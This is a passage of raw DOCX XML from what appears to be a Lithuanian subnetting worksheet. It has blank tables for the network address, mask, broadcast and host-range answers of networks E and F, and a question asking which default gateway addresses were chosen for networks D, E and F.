          </w:tcPr>
          <w:p w14:paraId="79E00F9D" w14:textId="77777777" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="077ED8F9" w14:textId="77777777" w:rsidTr="009D5F8C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1971" w:type="pct"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="312FDECD" w14:textId="77777777" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>Pirmas Host IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3029" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="14832DC0" w14:textId="77777777" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w14:paraId="3686D8FC" w14:textId="77777777" w:rsidTr="009D5F8C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1971" w:type="pct"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2856811B" w14:textId="77777777" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>Paskutinis Host IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3029" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="19A3A893" w14:textId="77777777" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6E3EFD42" w14:textId="40AD2A71" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="5000" w:type="pct"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="3907"/>
        <w:gridCol w:w="6004"/>
      </w:tblGrid>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="27723DD0" w14:textId="77777777" w:rsidTr="009D5F8C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5000" w:type="pct"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="0186B249" w14:textId="77777777" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Tinklas E</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="5EDA89F8" w14:textId="77777777" w:rsidTr="009D5F8C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1971" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="64BA1D3E" w14:textId="77777777" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>Tinklo IP/prefiksas</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3029" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="5300C035" w14:textId="77777777" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="006C0008" w14:textId="77777777" w:rsidTr="009D5F8C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1971" w:type="pct"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="00EBCB56" w14:textId="77777777" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>Tinklo kaukės IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3029" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="70E4465B" w14:textId="77777777" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="721103C9" w14:textId="77777777" w:rsidTr="009D5F8C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1971" w:type="pct"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4A49F25F" w14:textId="77777777" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Broadcast IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3029" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="11E3FA96" w14:textId="77777777" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="1A1AD5A9" w14:textId="77777777" w:rsidTr="009D5F8C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1971" w:type="pct"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="11CB382C" w14:textId="77777777" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>Pirmas Host IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3029" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="3C36B718" w14:textId="77777777" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w14:paraId="4710A6B6" w14:textId="77777777" w:rsidTr="009D5F8C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1971" w:type="pct"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="128361E1" w14:textId="77777777" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>Paskutinis Host IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3029" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="554EB207" w14:textId="77777777" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="64D86ABB" w14:textId="40AD2A71" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="5000" w:type="pct"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="3907"/>
        <w:gridCol w:w="6004"/>
      </w:tblGrid>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="19E7F9F1" w14:textId="77777777" w:rsidTr="009D5F8C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5000" w:type="pct"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="5D83873C" w14:textId="77777777" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Tinklas F</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="72D26FD7" w14:textId="77777777" w:rsidTr="009D5F8C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1971" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="736C50AA" w14:textId="77777777" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>Tinklo IP/prefiksas</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3029" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="1D5F79DA" w14:textId="77777777" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="4486C9F1" w14:textId="77777777" w:rsidTr="009D5F8C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1971" w:type="pct"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0E198E88" w14:textId="77777777" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>Tinklo kaukės IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3029" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="057DC1F7" w14:textId="77777777" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="2270DCDC" w14:textId="77777777" w:rsidTr="009D5F8C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1971" w:type="pct"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="01FDF8A6" w14:textId="77777777" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>Broadcast IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3029" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="0738A078" w14:textId="77777777" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="377F877B" w14:textId="77777777" w:rsidTr="009D5F8C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1971" w:type="pct"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5ED5B668" w14:textId="77777777" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>Pirmas Host IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3029" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="47C3A436" w14:textId="77777777" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w14:paraId="6069B45C" w14:textId="77777777" w:rsidTr="009D5F8C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1971" w:type="pct"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="327D47AF" w14:textId="77777777" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>Paskutinis Host IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3029" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="0B33E1CA" w14:textId="77777777" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="52390D2E" w14:textId="40AD2A71" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="71BB7CCB" w14:textId="40AD2A71" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Kokius Default Gateway IP adresus parinkote tinklams D, E, F?</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="5000" w:type="pct"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="3925"/>
        <w:gridCol w:w="5986"/>
      </w:tblGrid>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="1051A78D" w14:textId="77777777" w:rsidTr="009D5F8C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1980" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="40AF64D8" w14:textId="77777777" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:ind w:left="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Tinklas</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3020" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="23BC77EE" w14:textId="77777777" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:ind w:left="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Default Gateway</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="3831CFD4" w14:textId="77777777" w:rsidTr="009D5F8C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1980" w:type="pct"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="279587A5" w14:textId="77777777" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:ind w:left="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>D</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3020" w:type="pct"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2E8179FE" w14:textId="77777777" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:ind w:left="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="058C55CE" w14:textId="77777777" w:rsidTr="009D5F8C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1980" w:type="pct"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="69FEC796" w14:textId="77777777" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:ind w:left="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>E</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3020" w:type="pct"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6E3BC1F2" w14:textId="77777777" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:ind w:left="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w14:paraId="1F8142B8" w14:textId="77777777" w:rsidTr="009D5F8C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1980" w:type="pct"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="73C48118" w14:textId="77777777" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:ind w:left="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>F</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3020" w:type="pct"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="54997DF0" w14:textId="77777777" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:widowControl w:val="0"/>
